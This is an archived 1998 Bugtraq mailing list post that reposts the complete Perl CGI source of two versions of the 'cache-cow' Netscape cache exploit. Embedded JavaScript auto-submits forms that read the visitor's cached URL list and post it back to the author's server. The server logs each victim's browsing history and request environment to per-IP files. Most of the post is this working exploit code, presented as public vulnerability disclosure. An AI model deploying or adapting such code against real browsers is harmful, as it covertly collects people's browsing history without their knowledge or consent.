Bugtraq mailing list archives

Netscape Cache Exploit - source code

From: jkwilli2 () UNITY NCSU EDU (Ken Williams)
Date: Tue, 29 Sep 1998 13:26:22 -0400


Hi,

Below is source code for the two versions of the Netscape Cache
exploit that was recently discovered by Dan Brumleve
<nothing () shout net>, as found on his web site at
http://www.shout.net/~nothing/cache-cow/index.html

First version <cache-cow.cgi>, and then second version
<view-cache-cow-4.06.cgi> listed.

-----snip-----
#!/usr/bin/perl
#
# cache-cow.cgi -- Dan Brumleve <nothing () shout net>, 1998.08.23

my $self = "http://www.shout.net/nothing/cache-cow.cgi";;

if ($ENV{PATH_INFO}) {
  (my$o=<<"  EOF")=~s/\n|  //g;print"Content-type: text/html\n\n".$o;
  <html><body onLoad="document.f.submit()"><ba  se href="about:"><for
  m name=f action=cache method=post><input type=submit></form></body>
  </html>
  EOF
} elsif ($ENV{CONTENT_LENGTH}) {
  my $input;read(STDIN,$input,$ENV{CONTENT_LENGTH});sub unescape{my $s
  =shift;$s=~tr/+/ /;$s=~s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge;$s;}
  sub extract{my($n,$v)=map{unescape($_)}split(/=/,shift);}my$history=
  join("\n",sort map{my($n,$v)=extract($_);$v=~s/^about://;$v||();}#=)
  split(/&/,{map{extract($_)}split(/&/,$input)}->{cache}))."\n"; open(
  FP,">> logs/log-$ENV{REMOTE_ADDR}.txt");for(sort keys %ENV){print FP
  $_."=".$ENV{$_}."\n"}print FP "\n".$history."\n";close(FP);print"C".
  "ontent-type: text/plain\n\nHere are the URLs retrieved from your ".
  "browser:\n\n$history";
} else {
  (my$url=<<"  EOF")=~s/  |\n//g;print"Location: $url\n\n";
  $self/></a></body><script>function chunk(s){return("href=
  "+escape(s));}function moo(){if(!document.links.length){r
  eturn("");}var str=chunk(document.links[0]);var i=documen
  t.links.length;while(--i){str+="&"+chunk(document.links[i
  ]);}return(str);}</script><body onLoad="document.f.cache.
  value=moo();document.f.submit()"><form action="$self" nam
  e=f method=post><input type=hidden name=cache><input type
  =submit></form><a href=$self
  EOF
}

exit 0;
-----snip-----


-----snip-----
#!/usr/bin/perl
#
# cache-cow-4.06.cgi -- Dan Brumleve <nothing () shout net>, 1998.09.26

my $self = "http://www.shout.net/nothing/cache-cow-4.06.cgi";;

if ($ENV{QUERY_STRING}) {
  (my$o=<<"  EOF")=~s/\n|  //g;print"Content-type: text/html\n\n".$o;
  <html><head><script>function chunk(s){return("href=" + escape(s));}
  function moo(d){if(!d.l  inks.length){return("");} var str=chunk(d.
  links[0]);var i=d.links.length;wh  ile(--i){str+="&"+chunk(d.links[
  i]);} return(s  tr);}function check(){ var m=moo(top.cache.document
  ); if (m=="") { docume  nt.location.reload(); return; }document.f.c
  ache.value=m;doc  ument.f.submit();}</script></head><body onLoad="c
  heck()"><form acti  on="$self" name=f target=_top method=post><inpu
  t type=hidden name=cac  he><input type=submit></form></body></html>
  EOF
} elsif ($ENV{PATH_INFO}) {
  (my$o=<<"  EOF")=~s/\n|  //g;print"Content-type: text/html\n\n".$o;
  <html><body onLoad="document.f.submit()"><ba  se href="about:"><for
  m name=f action=cache method=post><input type=submit></form></body>
  </html>
  EOF
} elsif ($ENV{CONTENT_LENGTH}) {
  my $input;read(STDIN,$input,$ENV{CONTENT_LENGTH});sub unescape{my $s
  =shift;$s=~tr/+/ /;$s=~s/%([0-9a-fA-F]{2})/pack("c",hex($1))/ge;$s;}
  sub extract{my($n,$v)=map{unescape($_)}split(/=/,shift);}my$history=
  join("\n",sort map{my($n,$v)=extract($_);$v=~s/^about://;$v||();}#=)
  split(/&/,{map{extract($_)}split(/&/,$input)}->{cache}))."\n"; open(
  FP,">> logs/log-$ENV{REMOTE_ADDR}.txt");for(sort keys %ENV){print FP
  $_."=".$ENV{$_}."\n"}print FP "\n".$history."\n";close(FP);print"C".
  "ontent-type: text/plain\n\nHere are the URLs retrieved from your ".
  "browser:\n\n$history";
} else {
  print"Content-type: text/html\n\n".<<"  EOF";
  <html><head> <frameset rows="1,*"><frame src=
  "$self?cow" name=cow><frame src="$self/cache"
  name=cache></frameset></head></html>
  EOF
}

exit 0;
-----snip-----


--
Ken Williams

Packet Storm Security http://www.Genocide2600.com/~tattooman/index.shtml
E.H.A.P. Corporation  http://www.ehap.org/  ehap () ehap org info () ehap org
NCSU Comp Sci Dept    http://www.csc.ncsu.edu/ jkwilli2 () adm csc ncsu edu
PGP DSS/DH/RSA Keys   http://www4.ncsu.edu/~jkwilli2/pgpkey/

__________________________________________________
Get Your Private, Free Email at http://www.nsa.gov

Current thread:

Snork exploit, (continued)
- - - Snork exploit route () RESENTMENT INFONEXUS COM (Sep 29)
    - Re: rpc.mountd vulnerabilities Alan Brown (Sep 29)
    - IRIX Mail(1)/mailx(1) Security Issues SGI Security Coordinator (Sep 29)
    - IRIX On-Line Customer Registration Vulnerabilities SGI Security Coordinator (Sep 29)
    - IRIX mail(1)/rmail(1M)/sendmail(1M) Security Vulnerabilities SGI Security Coordinator (Sep 29)
    - Re: rpc.mountd vulnerabilities Olaf Kirch (Sep 30)
    - ISS Security Advisory: Snork X-Force (Sep 29)
    - Re: mountd- more info (sorry) John Caldwell (Sep 29)
    - Re: mountd- more info (sorry) Anthony C. Zboralski (Sep 30)
    - more rpc.mountd jason valentine (Sep 30)
    - Netscape Cache Exploit - source code Ken Williams (Sep 29)
    - Re: IRIX 6.2 passwordless accounts exploit? Kevin Hawkins (Sep 30)
    - Sun Security Bulletin #00176 joshua grubman (Sep 30)
    - Re: IRIX 6.2 passwordless accounts exploit? morex .- (Sep 28)
    - mountd remote exploit? John Caldwell (Sep 28)
    - Re: mountd remote exploit? morex .- (Sep 28)
    - Re: IRIX 6.2 passwordless accounts exploit? Charl Botha (Sep 29)
    - Re: IRIX 6.2 passwordless accounts exploit? Renaud Deraison (Sep 29)
    - rpc.mountd exploit Hudin Lucian (Sep 29)